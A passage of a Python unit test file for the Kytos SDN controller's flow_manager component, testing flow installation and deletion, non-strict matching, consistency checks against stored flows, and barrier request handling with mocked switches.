response = api.post(url, json={"flows": [{"priority": 25}]})
self.assertEqual(response.status_code, 424)
@patch("napps.kytos.flow_manager.main.Main._store_changed_flows")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
@patch("napps.kytos.flow_manager.main.Main._add_flow_mod_sent")
@patch("napps.kytos.flow_manager.main.Main._send_barrier_request")
@patch("napps.kytos.flow_manager.main.Main._send_flow_mod")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_rest_flow_mod_add_switch_not_connected_force(self, *args):
"""Test sending a flow mod when a swith isn't connected with force option."""
(
mock_flow_factory,
mock_send_flow_mod,
_,
_,
_,
mock_store_changed_flows,
) = args
api = get_test_client(self.napp.controller, self.napp)
mock_send_flow_mod.side_effect = SwitchNotConnectedError(
"error", flow=MagicMock()
)
_id = str(uuid4())
serializer = MagicMock()
flow = MagicMock()
flow.id.return_value = _id
serializer.from_dict.return_value = flow
mock_flow_factory.return_value = serializer
url = f"{self.API_URL}/v2/flows"
flow_dict = {"flows": [{"priority": 25}]}
response = api.post(url, json=dict(flow_dict, **{"force": True}))
self.assertEqual(response.status_code, 202)
mock_store_changed_flows.assert_called_with(
"add",
flow_dict["flows"][0],
mock_flow_factory().from_dict().id,
self.switch_01,
)
def test_get_all_switches_enabled(self):
"""Test _get_all_switches_enabled method."""
switches = self.napp._get_all_switches_enabled()
self.assertEqual(switches, [self.switch_01])
@patch("napps.kytos.flow_manager.main.Main._store_changed_flows")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
@patch("napps.kytos.flow_manager.main.Main._add_flow_mod_sent")
@patch("napps.kytos.flow_manager.main.Main._send_barrier_request")
@patch("napps.kytos.flow_manager.main.Main._send_flow_mod")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_install_flows(self, *args):
"""Test _install_flows method."""
(
mock_flow_factory,
mock_send_flow_mod,
mock_send_barrier_request,
mock_add_flow_mod_sent,
mock_send_napp_event,
_,
) = args
serializer = MagicMock()
flow = MagicMock()
flow_mod = MagicMock()
flow.as_of_add_flow_mod.return_value = flow_mod
serializer.from_dict.return_value = flow
mock_flow_factory.return_value = serializer
flows_dict = {"flows": [MagicMock()]}
switches = [self.switch_01]
self.napp._install_flows("add", flows_dict, switches)
mock_send_flow_mod.assert_called_with(flow.switch, flow_mod)
mock_add_flow_mod_sent.assert_called_with(flow_mod.header.xid, flow, "add")
mock_send_napp_event.assert_called_with(self.switch_01, flow, "pending")
mock_send_barrier_request.assert_called()
@patch("napps.kytos.flow_manager.main.Main._store_changed_flows")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
@patch("napps.kytos.flow_manager.main.Main._add_flow_mod_sent")
@patch("napps.kytos.flow_manager.main.Main._send_barrier_request")
@patch("napps.kytos.flow_manager.main.Main._send_flow_mod")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_install_flows_with_delete_strict(self, *args):
"""Test _install_flows method with strict delete command."""
(
mock_flow_factory,
mock_send_flow_mod,
mock_send_barrier_request,
mock_add_flow_mod_sent,
mock_send_napp_event,
_,
) = args
serializer = MagicMock()
flow = MagicMock()
flow_mod = MagicMock()
flow.as_of_strict_delete_flow_mod.return_value = flow_mod
serializer.from_dict.return_value = flow
mock_flow_factory.return_value = serializer
flows_dict = {"flows": [MagicMock()]}
switches = [self.switch_01]
self.napp._install_flows("delete_strict", flows_dict, switches)
mock_send_flow_mod.assert_called_with(flow.switch, flow_mod)
mock_add_flow_mod_sent.assert_called_with(
flow_mod.header.xid, flow, "delete_strict"
)
mock_send_napp_event.assert_called_with(self.switch_01, flow, "pending")
mock_send_barrier_request.assert_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_event_add_flow(self, mock_install_flows):
"""Test method for installing flows on the switches through events."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid)
self.napp.controller.switches = {dpid: switch}
mock_flow_dict = MagicMock()
event = get_kytos_event_mock(
name="kytos.flow_manager.flows.install",
content={"dpid": dpid, "flow_dict": mock_flow_dict},
)
self.napp.event_flows_install_delete(event)
mock_install_flows.assert_called_with(
"add", mock_flow_dict, [switch], reraise_conn=True
)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_event_flows_install_delete(self, mock_install_flows):
"""Test method for removing flows on the switches through events."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid)
self.napp.controller.switches = {dpid: switch}
mock_flow_dict = MagicMock()
event = get_kytos_event_mock(
name="kytos.flow_manager.flows.delete",
content={"dpid": dpid, "flow_dict": mock_flow_dict},
)
self.napp.event_flows_install_delete(event)
mock_install_flows.assert_called_with(
"delete", mock_flow_dict, [switch], reraise_conn=True
)
def test_add_flow_mod_sent(self):
"""Test _add_flow_mod_sent method."""
xid = 0
flow = MagicMock()
self.napp._add_flow_mod_sent(xid, flow, "add")
self.assertEqual(self.napp._flow_mods_sent[xid], (flow, "add"))
@patch("kytos.core.buffers.KytosEventBuffer.put")
def test_send_flow_mod(self, mock_buffers_put):
"""Test _send_flow_mod method."""
switch = get_switch_mock("00:00:00:00:00:00:00:01", 0x04)
flow_mod = MagicMock()
self.napp._send_flow_mod(switch, flow_mod)
mock_buffers_put.assert_called()
@patch("kytos.core.buffers.KytosEventBuffer.put")
def test_send_flow_mod_error(self, mock_buffers_put):
"""Test _send_flow_mod method error."""
switch = get_switch_mock("00:00:00:00:00:00:00:01", 0x04)
switch.is_connected = MagicMock(return_value=False)
flow_mod = MagicMock()
with self.assertRaises(SwitchNotConnectedError):
self.napp._send_flow_mod(switch, flow_mod)
mock_buffers_put.assert_not_called()
@patch("kytos.core.buffers.KytosEventBuffer.put")
def test_send_napp_event(self, mock_buffers_put):
"""Test _send_napp_event method."""
switch = get_switch_mock("00:00:00:00:00:00:00:01", 0x04)
flow = MagicMock()
for command in ["add", "delete", "delete_strict", "error"]:
self.napp._send_napp_event(switch, flow, command)
self.assertEqual(mock_buffers_put.call_count, 4)
@patch("napps.kytos.flow_manager.main.Main._del_stored_flow_by_id")
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_handle_errors(self, mock_send_napp_event, mock_del_stored):
"""Test handle_errors method."""
flow = MagicMock()
flow.as_dict.return_value = {}
flow.cookie = 0
self.napp._flow_mods_sent[0] = (flow, "add")
switch = get_switch_mock("00:00:00:00:00:00:00:01")
switch.connection = get_connection_mock(
0x04, get_switch_mock("00:00:00:00:00:00:00:01")
)
protocol = MagicMock()
protocol.unpack.return_value = "error_packet"
switch.connection.protocol = protocol
message = MagicMock()
message.header.xid.value = 0
message.error_type = 2
message.code = 5
event = get_kytos_event_mock(
name=".*.of_core.*.ofpt_error",
content={"message": message, "source": switch.connection},
)
self.napp.handle_errors(event)
mock_send_napp_event.assert_called_with(
flow.switch,
flow,
"error",
error_command="add",
error_code=5,
error_type=2,
)
mock_del_stored.assert_called()
@patch("napps.kytos.flow_manager.main.StoreHouse.get_data")
def test_load_flows(self, mock_storehouse):
"""Test load flows."""
self.napp._load_flows()
mock_storehouse.assert_called()
@patch("napps.kytos.flow_manager.main.ENABLE_CONSISTENCY_CHECK", False)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
def test_resend_stored_flows(self, mock_install_flows):
"""Test resend stored flows."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
mock_event = MagicMock()
flow = {"command": "add", "flow": MagicMock()}
mock_event.content = {"switch": switch}
self.napp.controller.switches = {dpid: switch}
self.napp.stored_flows = {dpid: {0: [flow]}}
self.napp.resend_stored_flows(mock_event)
mock_install_flows.assert_called()
@patch("napps.kytos.of_core.flow.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_store_changed_flows(self, mock_save_flow, _):
"""Test store changed flows."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow = {
"priority": 17,
"cookie": 84114964,
"command": "add",
"match": {"dl_dst": "00:15:af:d5:38:98"},
}
match_fields = {
"priority": 17,
"cookie": 84114964,
"command": "add",
"dl_dst": "00:15:af:d5:38:98",
}
flows = {"flow": flow}
command = "add"
stored_flows = {
84114964: [
{
"match_fields": match_fields,
"flow": flow,
}
]
}
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flows, str(uuid4()), switch)
mock_save_flow.assert_called()
self.napp.stored_flows = {}
self.napp._store_changed_flows(command, flows, str(uuid4()), switch)
mock_save_flow.assert_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_switch_consistency_add(self, *args):
"""Test check_switch_consistency method.
This test checks the case when a flow is missing in switch and have the
ADD command.
"""
(mock_flow_factory, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.flows = []
flow_1 = MagicMock()
flow_1.as_dict.return_value = {"flow_1": "data"}
stored_flows = [{"flow": {"flow_1": "data"}}]
serializer = MagicMock()
serializer.flow.cookie.return_value = 0
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {dpid: {0: stored_flows}}
self.napp.check_switch_consistency(switch)
mock_install_flows.assert_called()
@patch("napps.kytos.flow_manager.storehouse.StoreHouse.save_flow")
def test_add_overlapping_flow(self, *args):
"""Test add an overlapping flow."""
(_,) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
cookie = 0x20
self.napp.stored_flows = {
dpid: {
cookie: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [{"action_type": "output", "port": 2}],
}
}
]
}
}
new_actions = [{"action_type": "output", "port": 3}]
flow_dict = {
"priority": 10,
"cookie": cookie,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": new_actions,
}
_id = str(uuid4())
self.napp._add_flow_store(flow_dict, _id, switch)
assert len(self.napp.stored_flows[dpid]) == 1
assert self.napp.stored_flows[dpid][0x20][0]["flow"]["actions"] == new_actions
assert (
self.napp.stored_flows[dpid][0x20][0]["state"]
== FlowEntryState.PENDING.value
)
assert self.napp.stored_flows[dpid][0x20][0]["_id"] == _id
assert self.napp.stored_flows[dpid][0x20][0]["created_at"]
@patch("napps.kytos.flow_manager.storehouse.StoreHouse.save_flow")
def test_add_overlapping_flow_multiple_stored(self, *args):
"""Test add an overlapping flow with multiple flows stored."""
(_,) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
cookie = 0x20
stored_flows_list = [
{
"flow": {
"actions": [{"action_type": "output", "port": 2}],
"match": {"dl_vlan": 100, "in_port": 1},
"priority": 10,
},
},
{
"flow": {
"actions": [{"action_type": "output", "port": 3}],
"match": {"dl_vlan": 200, "in_port": 1},
"priority": 10,
},
},
{
"flow": {
"actions": [{"action_type": "output", "port": 4}],
"match": {"dl_vlan": 300, "in_port": 1},
"priority": 10,
},
},
{
"flow": {
"actions": [{"action_type": "output", "port": 4}],
"match": {"in_port": 1},
"priority": 10,
},
},
]
self.napp.stored_flows = {dpid: {cookie: list(stored_flows_list)}}
new_actions = [{"action_type": "output", "port": 3}]
overlapping_flow = {
"priority": 10,
"cookie": cookie,
"match": {
"in_port": 1,
},
"actions": new_actions,
}
_id = str(uuid4())
self.napp._add_flow_store(overlapping_flow, _id, switch)
assert len(self.napp.stored_flows[dpid][cookie]) == len(stored_flows_list)
# only the last flow is expected to be strictly matched
self.assertDictEqual(
self.napp.stored_flows[dpid][cookie][len(stored_flows_list) - 1]["flow"],
overlapping_flow,
)
# all flows except the last one should still be the same
for i in range(0, len(stored_flows_list) - 1):
self.assertDictEqual(
self.napp.stored_flows[dpid][cookie][i], stored_flows_list[i]
)
@patch("napps.kytos.flow_manager.storehouse.StoreHouse.save_flow")
def test_add_overlapping_flow_diff_priority(self, *args):
"""Test that a different priority wouldn't overlap."""
(_,) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
cookie = 0x20
self.napp.stored_flows = {
dpid: {
cookie: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [{"action_type": "output", "port": 2}],
}
}
]
}
}
new_actions = [{"action_type": "output", "port": 3}]
flow_dict = {
"priority": 11,
"cookie": cookie,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": new_actions,
}
_id = str(uuid4())
self.napp._add_flow_store(flow_dict, _id, switch)
assert len(self.napp.stored_flows[dpid][cookie]) == 2
assert (
self.napp.stored_flows[dpid][cookie][1]["state"]
== FlowEntryState.PENDING.value
)
assert self.napp.stored_flows[dpid][0x20][1]["_id"] == _id
assert self.napp.stored_flows[dpid][cookie][1]["created_at"]
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_switch_flow_not_missing(self, *args):
"""Test check_switch_consistency method.
This test checks the case when flow is not missing.
"""
(mock_flow_factory, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
flow_1 = MagicMock()
flow_dict = {
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
}
}
flow_1.cookie = 84114904
flow_1.as_dict.return_value = flow_dict
serializer = MagicMock()
serializer.from_dict.return_value = flow_1
switch.flows = [flow_1]
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {
dpid: {
84114904: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
}
}
]
}
}
self.napp.check_switch_consistency(switch)
mock_install_flows.assert_not_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_switch_flow_missing(self, *args):
"""Test check_switch_consistency method.
This test checks the case when flow is missing.
"""
(mock_flow_factory, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
flow_1 = MagicMock()
flow_dict = {
"flow": {
"match": {
"in_port": 1,
},
"actions": [],
}
}
flow_1.cookie = 0
flow_1.as_dict.return_value = flow_dict
serializer = MagicMock()
serializer.from_dict.return_value = flow_1
switch.flows = [flow_1]
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {
dpid: {
84114904: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
}
}
]
}
}
self.napp.check_switch_consistency(switch)
mock_install_flows.assert_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_switch_consistency_ignore(self, *args):
"""Test check_switch_consistency method.
This test checks the case when a flow is missing in the last received
flow_stats because the flow was just installed. Thus, it should be
ignored.
"""
(mock_flow_factory, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.flows = []
flow_1 = MagicMock()
flow_1.as_dict.return_value = {"flow_1": "data"}
stored_flows = {
0: [
{
"created_at": now().strftime("%Y-%m-%dT%H:%M:%S"),
"flow": {"flow_1": "data"},
}
]
}
serializer = MagicMock()
serializer.flow.cookie.return_value = 0
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {dpid: stored_flows}
self.napp.check_switch_consistency(switch)
mock_install_flows.assert_not_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_check_storehouse_consistency(self, *args):
"""Test check_storehouse_consistency method.
This test checks the case when a flow is missing in storehouse.
"""
(mock_flow_factory, mock_install_flows) = args
cookie_exception_interval = [(0x2B00000000000011, 0x2B000000000000FF)]
self.napp.cookie_exception_range = cookie_exception_interval
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
flow_1 = MagicMock()
flow_1.cookie = 0x2B00000000000010
flow_1.as_dict.return_value = {"flow_1": "data", "cookie": 1}
switch.flows = [flow_1]
stored_flows = [{"flow": {"flow_2": "data", "cookie": 1}}]
serializer = flow_1
mock_flow_factory.return_value = serializer
self.napp.stored_flows = {dpid: {0: stored_flows}}
self.napp.check_storehouse_consistency(switch)
mock_install_flows.assert_called()
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_with_cookie(self, *args):
"""Test the non-strict matching method.
A FlowMod with a non zero cookie but empty match fields shouldn't match
other existing installed flows that have match clauses.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"flow": {
"actions": [{"action_type": "output", "port": 4294967293}],
"match": {"dl_vlan": 3799, "dl_type": 35020},
},
}
flow_to_install = {
"cookie": 6191162389751548793,
"cookie_mask": 18446744073709551615,
}
stored_flows = {0: [stored_flow]}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_not_called()
self.assertDictEqual(self.napp.stored_flows[dpid][0][0], stored_flow)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete a Flow using a cookie.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"flow": {
"actions": [{"action_type": "set_vlan", "vlan_id": 300}],
"cookie": 6191162389751548793,
"match": {"dl_vlan": 300, "in_port": 1},
},
}
stored_flow2 = {
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
},
}
flow_to_install = {
"cookie": 6191162389751548793,
"cookie_mask": 18446744073709551615,
}
stored_flows = {
6191162389751548793: [stored_flow],
4961162389751548787: [stored_flow2],
}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
self.assertEqual(len(self.napp.stored_flows), 1)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_with_ipv4(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete a Flow using IPv4.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_to_install = {"match": {"ipv4_src": "192.168.1.1"}}
stored_flows = {
84114904: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.1.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
}
}
],
4961162389751548787: [
{
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
}
}
],
}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
expected_stored = {
4961162389751548787: [
{
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
},
},
]
}
self.assertDictEqual(self.napp.stored_flows[dpid], expected_stored)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_in_port(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete a Flow matching in_port.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_to_install = {"match": {"in_port": 1}}
stored_flow = {
0: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"in_port": 1,
"dl_vlan": 100,
},
"actions": [],
},
},
{
"flow": {
"actions": [],
"match": {"in_port": 2},
},
},
{
"flow": {
"priority": 20,
"cookie": 84114904,
"match": {
"in_port": 1,
"dl_vlan": 102,
},
"actions": [],
},
},
]
}
command = "delete"
self.napp.stored_flows = {dpid: stored_flow}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
expected_stored = {
0: [
{
"flow": {"actions": [], "match": {"in_port": 2}},
}
]
}
self.assertDictEqual(self.napp.stored_flows[dpid], expected_stored)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_all_if_empty_match(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete all if empty match is given.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
flow_to_install = {"match": {}}
stored_flow = {
0: [
{
"flow": {
"priority": 10,
"match": {
"in_port": 1,
"dl_vlan": 100,
},
"actions": [],
}
},
{
"flow": {
"priority": 20,
"match": {
"in_port": 1,
"dl_vlan": 102,
},
"actions": [],
},
},
]
}
command = "delete"
self.napp.stored_flows = {dpid: stored_flow}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
expected_stored = {}
self.assertDictEqual(self.napp.stored_flows[dpid], expected_stored)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_with_ipv4_fail(self, *args):
"""Test the non-strict matching method.
Test non-strict Fail case matching to delete a Flow using IPv4.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.2.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
},
}
stored_flow2 = {
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
},
}
flow_to_install = {"match": {"ipv4_src": "192.168.20.20"}}
stored_flows = {0: [stored_flow, stored_flow2]}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_not_called()
expected_stored = {
0: [
{
"flow": {
"priority": 10,
"cookie": 84114904,
"match": {
"ipv4_src": "192.168.2.1",
"ipv4_dst": "192.168.0.2",
},
"actions": [],
},
},
{
"flow": {
"actions": [],
"cookie": 4961162389751548787,
"match": {"in_port": 2},
},
},
]
}
self.assertDictEqual(self.napp.stored_flows[dpid], expected_stored)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_no_strict_delete_of10(self, *args):
"""Test the non-strict matching method.
Test non-strict matching to delete a Flow using OF10.
"""
(mock_save_flow, _, _) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x01)
switch.id = dpid
stored_flow = {
"command": "add",
"flow": {
"actions": [{"max_len": 65535, "port": 6}],
"cookie": 4961162389751548787,
"match": {
"in_port": 80,
"dl_src": "00:00:00:00:00:00",
"dl_dst": "f2:0b:a4:7d:f8:ea",
"dl_vlan": 0,
"dl_vlan_pcp": 0,
"dl_type": 0,
"nw_tos": 0,
"nw_proto": 0,
"nw_src": "192.168.0.1",
"nw_dst": "0.0.0.0",
"tp_src": 0,
"tp_dst": 0,
},
"out_port": 65532,
"priority": 123,
},
}
stored_flow2 = {
"command": "add",
"flow": {
"actions": [],
"cookie": 4961162389751654,
"match": {
"in_port": 2,
"dl_src": "00:00:00:00:00:00",
"dl_dst": "f2:0b:a4:7d:f8:ea",
"dl_vlan": 0,
"dl_vlan_pcp": 0,
"dl_type": 0,
"nw_tos": 0,
"nw_proto": 0,
"nw_src": "192.168.0.1",
"nw_dst": "0.0.0.0",
"tp_src": 0,
"tp_dst": 0,
},
"out_port": 655,
"priority": 1,
},
}
flow_to_install = {"match": {"in_port": 80, "wildcards": 4194303}}
stored_flows = {0: [stored_flow, stored_flow2]}
command = "delete"
self.napp.stored_flows = {dpid: stored_flows}
self.napp._store_changed_flows(command, flow_to_install, str(uuid4()), switch)
mock_save_flow.assert_called()
self.assertEqual(len(self.napp.stored_flows[dpid]), 0)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_consistency_cookie_ignored_range(self, *args):
"""Test the consistency `cookie` ignored range."""
(_, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
cookie_ignored_interval = [
(0x2B00000000000011, 0x2B000000000000FF),
0x2B00000000000100,
]
self.napp.cookie_ignored_range = cookie_ignored_interval
flow = MagicMock()
expected = [
(0x2B00000000000010, 1),
(0x2B00000000000013, 0),
(0x2B00000000000100, 0),
(0x2B00000000000101, 1),
]
for cookie, called in expected:
with self.subTest(cookie=cookie, called=called):
mock_install_flows.call_count = 0
flow.cookie = cookie
flow.as_dict.return_value = {"flow_1": "data", "cookie": cookie}
switch.flows = [flow]
self.napp.stored_flows = {dpid: {0: [flow]}}
self.napp.check_storehouse_consistency(switch)
self.assertEqual(mock_install_flows.call_count, called)
@patch("napps.kytos.flow_manager.main.Main._install_flows")
@patch("napps.kytos.flow_manager.main.FlowFactory.get_class")
def test_consistency_table_id_ignored_range(self, *args):
"""Test the consistency `table_id` ignored range."""
(_, mock_install_flows) = args
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
table_id_ignored_interval = [(1, 2), 3]
self.napp.tab_id_ignored_range = table_id_ignored_interval
flow = MagicMock()
expected = [(0, 1), (3, 0), (4, 1)]
for table_id, called in expected:
with self.subTest(table_id=table_id, called=called):
mock_install_flows.call_count = 0
flow.table_id = table_id
switch.flows = [flow]
self.napp.stored_flows = {dpid: {0: [flow]}}
self.napp.check_storehouse_consistency(switch)
self.assertEqual(mock_install_flows.call_count, called)
def test_check_consistency_concurrency_control(self):
"""Test check consistency concurrency control, only a single
thread per switch is expected within a delta T."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
n_threads = 10
check_store = MagicMock()
check_switch = MagicMock()
self.napp.check_storehouse_consistency = check_store
self.napp.check_switch_consistency = check_switch
# upfront a call
self.napp.check_consistency(switch)
threads = []
for _ in range(n_threads):
thread = threading.Thread(
target=self.napp.check_consistency, args=(switch,)
)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
# only a single call to check_storehouse_consistency is expected
assert check_store.call_count == 1
def test_stored_flows_by_state(self):
"""Test stored_flows_by_state method."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"_id": "1",
"state": "installed",
"flow": {
"match": {
"ipv4_src": "192.168.2.1",
},
},
}
stored_flow2 = {
"_id": "2",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.2",
},
},
}
self.napp.stored_flows = {dpid: {0: [stored_flow, stored_flow2]}}
filtered = self.napp.stored_flows_by_state(dpid, "installed")
assert len(filtered) == 1
self.assertDictEqual(filtered["1"], stored_flow)
@patch("napps.kytos.flow_manager.main.Main._send_napp_event")
def test_on_ofpt_flow_removed(self, mock_send_napp_event):
"""Test on_ofpt_flow_removed."""
mock = MagicMock()
mock.source.switch = "switch"
mock.message = {}
self.napp._on_ofpt_flow_removed(mock)
mock_send_napp_event.assert_called_with("switch", {}, "delete")
@patch("napps.kytos.flow_manager.main.StoreHouse.save_flow")
def test_del_stored_flow_by_id(self, mock_save_flow):
"""Test delete stored flow by id."""
dpid = "00:00:00:00:00:00:00:01"
switch = get_switch_mock(dpid, 0x04)
switch.id = dpid
stored_flow = {
"_id": "1",
"state": "installed",
"flow": {
"match": {
"ipv4_src": "192.168.2.1",
},
},
}
stored_flow2 = {
"_id": "2",
"state": "pending",
"flow": {
"match": {
"ipv4_src": "192.168.2.2",
},
},
}
cookie = 0
mock_save_flow.return_value = lambda x: x
self.napp.stored_flows = {dpid: {cookie: [stored_flow, stored_flow2]}}
assert len(self.napp.stored_flows[dpid][cookie]) == 2
self.napp._del_stored_flow_by_id(dpid, cookie, "1")
assert len(self.napp.stored_flows[dpid][cookie]) == 1
self.assertDictEqual(self.napp.stored_flows[dpid][cookie][0], stored_flow2)
def test_add_barrier_request(self):
"""Test add barrier request."""
dpid = "00:00:00:00:00:00:00:01"
barrier_xid = 1
flow_xid = 2
assert flow_xid not in self.napp._pending_barrier_reply[dpid]
self.napp._add_barrier_request(dpid, barrier_xid, flow_xid)
assert self.napp._pending_barrier_reply[dpid][barrier_xid] == flow_xid
def test_add_barrier_request_max_size_fifo(self):
"""Test add barrier request max size fifo popitem."""
dpid = "00:00:00:00:00:00:00:01"
max_size = 3
barrier_xid_offset = 0
flow_xid_offset = 1000
overflow = 1
